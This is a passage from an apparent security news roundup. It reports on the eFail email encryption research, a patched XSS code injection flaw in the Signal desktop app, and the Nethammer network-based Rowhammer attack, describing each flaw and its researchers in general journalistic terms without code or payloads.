Researchers also advise users to adopt an authenticated encryption algorithm for sensitive communication.
The research was conducted by a team of researchers, including Damian Poddebniak, Christian Dresen, Fabian Ising, and Sebastian Schinzel from Munster University of Applied Sciences; Jens Müller, Juraj Somorovsky, and Jörg Schwenk from Ruhr University Bochum; and Simon Friedberger from KU Leuven.
For more in-depth details on the attack technique, you can head on to this informational page about the eFail attack and the paper [ PDF ] titled, "Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels," published by the researchers.

Code Injection Attack Works in Signal Messaging App

After the revelation of the eFail attack details, it's time to reveal how the recently reported code injection vulnerability in the popular end-to-end encrypted Signal messaging app works.
As we reported last weekend, Signal has patched its messaging app for Windows and Linux that suffered a code injection vulnerability discovered and reported by a team of white-hat hackers from Argentina.


The vulnerability could have been exploited by remote attackers to inject a malicious payload inside the Signal desktop app running on the recipients' system just by sending them a specially crafted link—without requiring any user interaction.
According to a blog post published today, the vulnerability was accidentally discovered while researchers–Iván Ariel Barrera Oro, Alfredo Ortega and Juliano Rizzo–were chatting on Signal messenger and one of them shared a link of a vulnerable site with an XSS payload in its URL.
However, the XSS payload unexpectedly got executed on the Signal desktop app.
XSS, also known as cross-site scripting, is a common attack vector that allows attackers to inject malicious code into a vulnerable web application.
After analyzing the scope of this issue by testing multiple XSS payloads, researchers found that the vulnerability resides in the function responsible for handling shared links, allowing attackers to inject user-defined HTML/JavaScript code via iFrame, image, video and audio tags.
Using this vulnerability, attackers can even inject a form on the recipient's chat window, tricking them to reveal their sensitive information using social engineering attacks.
It had previously been speculated that the Signal flaw might have allowed attackers to execute system commands or gain sensitive information like decryption keys—but no, it is not the case.
The vulnerability was immediately patched by the Signal developers shortly after the proof-of-concept video was released by Ortega last weekend.
The researchers also found that a patch (regex function to validate URLs) for this vulnerability existed in previous versions of the desktop app, but it was somehow removed or skipped in the Signal update released on 10th April this year.
Now, after knowing full details of the vulnerability, it seems that the issue is not a critical or dangerous one, as speculated.
So you can freely rely on Signal for encrypted communication without any worries. Just make sure the service is always up-to-date

Exploiting DRAM Rowhammer Bug Through Network Requests

Last week, we reported about the first network-based remote Rowhammer attack, dubbed Throwhammer, which involves the exploitation a known vulnerability in DRAM through network cards using remote direct memory access (RDMA) channels.
However, a separate team of security researchers has now demonstrated a second network-based remote
Rowhammer technique that can be used to attack systems using uncached memory or flush instruction while processing the network requests.
The research was carried out by researchers who discovered Meltdown and Spectre CPU vulnerabilities, which is independent of the Amsterdam researchers who presented a series of Rowhammer attacks, including Throwhammer published last week.
If you are unaware, Rowhammer is a critical issue with recent generation dynamic random access memory (DRAM) chips in which repeatedly accessing a row of memory can cause "bit flipping" in an adjacent row, allowing attackers to change the contents of the memory.
The issue has since been exploited in a number of ways to escalate an attacker's privilege to kernel level and achieve remote code execution on the vulnerable systems, but the attacker needed access to the victim’s machine.
However, the new Rowhammer attack technique, dubbed Nethammer, can be used to execute arbitrary code on the targeted system by rapidly writing and rewriting memory used for packet processing, which would be possible only with a fast network connection between the attacker and victim.
This causes a high number of memory accesses to the same set of memory locations, which eventually induces disturbance errors in DRAM and causes memory corruption by unintentionally flipping the DRAM bit-value.
The resulting data corruption can then be manipulated by the attacker to gain control over the victim's system.
"To mount a Rowhammer attack, memory accesses need to be directly served by the main memory. Thus, an attacker needs to make sure that the data is not stored in the cache," the researcher paper [ PDF ] reads.
Since caching makes an attack difficult, the researchers developed ways that allowed them to bypass the cache and attack directly into the DRAM to cause the row conflicts in the memory cells required for the Rowhammer attack.
Researchers tested Nethammer for the three cache-bypass techniques:
A kernel driver that flushes (and reloads) an address whenever a packet is received.
Intel Xeon CPUs with Intel CAT for fast cache eviction
Uncached memory on an ARM-based mobile device.
All three scenarios are possible, researchers showed.
In their experimental setup, researchers were successfully able to induce a bit flip every 350 ms by sending a stream of UDP packets with up to 500 Mbit/s to the target system.
Since the Nethammer attack technique does not require any attack code in contrast to a regular Rowhammer attack, for example, no attacker-controlled code on the system, most countermeasures do not prevent this attack.
Since Rowhammer exploits a computer hardware weakness, no software patch can completely fix the issue. Researchers believe the Rowhammer threat is not only real but also has potential to cause real, severe damage.
For more in-depth details on the new attack technique, you can head on to this paper , titled "Nethammer: Inducing Rowhammer Faults through Network Requests," published by the researchers earlier this week.